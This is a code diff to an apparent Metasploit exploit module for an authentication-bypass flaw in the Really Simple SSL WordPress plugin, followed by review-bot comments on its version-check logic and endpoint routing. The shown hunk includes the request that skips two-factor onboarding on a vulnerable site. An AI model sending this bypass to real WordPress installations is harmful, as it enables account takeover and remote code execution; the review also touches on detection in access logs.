diff --git a/modules/exploits/multi/http/wp_reallysimplessl_2fa_bypass_rce.rb b/modules/exploits/multi/http/wp_reallysimplessl_2fa_bypass_rce.rb
index 97e097827edda..bb6cdb918eb1b 100644
--- a/modules/exploits/multi/http/wp_reallysimplessl_2fa_bypass_rce.rb
+++ b/modules/exploits/multi/http/wp_reallysimplessl_2fa_bypass_rce.rb
@@ -85,21 +85,17 @@ def initialize(info = {})
   def check
     return CheckCode::Unknown('The WordPress site does not appear to be online.') unless wordpress_and_online?
-    print_status("WordPress Version: #{wordpress_version}") if wordpress_version
-
     %w[really-simple-ssl really-simple-ssl-pro really-simple-ssl-pro-multisite].each do |slug|
-      case check_plugin_version_from_readme(slug, '9.1.2', '9.0.0').code
+      plugin_check = check_plugin_version_from_readme(slug, '9.1.2', '9.0.0')
+      case plugin_check.code
       when 'appears'
-        print_good("Detected vulnerable plugin slug: #{slug}")
         return CheckCode::Appears("Plugin #{slug} appears to be vulnerable.")
       when 'safe'
-        print_status("Plugin #{slug} is patched or not vulnerable.")
-      when 'unknown'
-        print_status("Plugin #{slug} could not be verified or is not installed.")
+        return CheckCode::Safe("Plugin #{slug} is patched or not vulnerable.")
       end
     end
-    CheckCode::Safe('None of the detected plugins are vulnerable.')
+    return CheckCode::Unknown('No vulnerable plugins were detected.')
   end
 
   def exploit
@@ -122,13 +118,16 @@ def bypass_2fa
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'wp-json', 'reallysimplessl', 'v1', 'two_fa', 'skip_onboarding'),
+      'uri' => normalize_uri(target_uri.path),
       'ctype' => 'application/json',
       'data' => {
         'user_id' => user_id,
         'login_nonce' => login_nonce,
         'redirect_to' => '/wp-admin/'
-      }.to_json
+      }.to_json,
+      'vars_get' => {
+        'rest_route' => '/reallysimplessl/v1/two_fa/skip_onboarding'
+      }
     })
 
     raise WordPressNotOnline, 'No response from the target' unless res
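Review bot: The new `when 'safe'` branch returns `CheckCode::Safe` for the first slug whose readme reports a patched version, so the remaining entries of the `%w[...]` list are never examined; if more than one variant's readme is reachable on a site, a vulnerable pro variant listed after a patched free one would be reported as safe, whereas the old loop kept going. Keep iterating, remember that a patched variant was seen, and only return Safe once every slug has been checked, as sketched below. The trailing `return CheckCode::Unknown(...)` is also redundant on the method's last expression (RuboCop Style/RedundantReturn) and reads better as `CheckCode::Unknown('No vulnerable plugins were detected.')`. `plugin_check` is assigned and used once; the previous inline `case check_plugin_version_from_readme(...).code` was no less clear.
```ruby
  def check
    # … unchanged: online check …
    safe_slug = nil
    %w[really-simple-ssl really-simple-ssl-pro really-simple-ssl-pro-multisite].each do |slug|
      case check_plugin_version_from_readme(slug, '9.1.2', '9.0.0').code
      when 'appears'
        return CheckCode::Appears("Plugin #{slug} appears to be vulnerable.")
      when 'safe'
        # Remember the patched slug but keep checking the other variants.
        safe_slug ||= slug
      end
    end
    return CheckCode::Safe("Plugin #{safe_slug} is patched or not vulnerable.") if safe_slug

    CheckCode::Unknown('No vulnerable plugins were detected.')
  end
```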
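Review bot: The switch from the `wp-json/...` path to a `rest_route` query parameter is undocumented in the hunk; a comment above `'uri' => normalize_uri(target_uri.path),` such as `# Address the REST endpoint via ?rest_route= so the request does not depend on the site's permalink settings (the /wp-json/ prefix presumably only exists with pretty permalinks enabled).` would record the reason for the change. The route string `'/reallysimplessl/v1/two_fa/skip_onboarding'` is now the only reference to the endpoint in this method and could be hoisted to a named frozen constant next to the plugin slugs used by `check`, so the two stay in sync. For detection engineering it is worth noting that the route now travels in the query string, which web server access logs typically record, rather than only in the POST body. `bypass_2fa` starts before this hunk, and `user_id` and `login_nonce` are defined outside it.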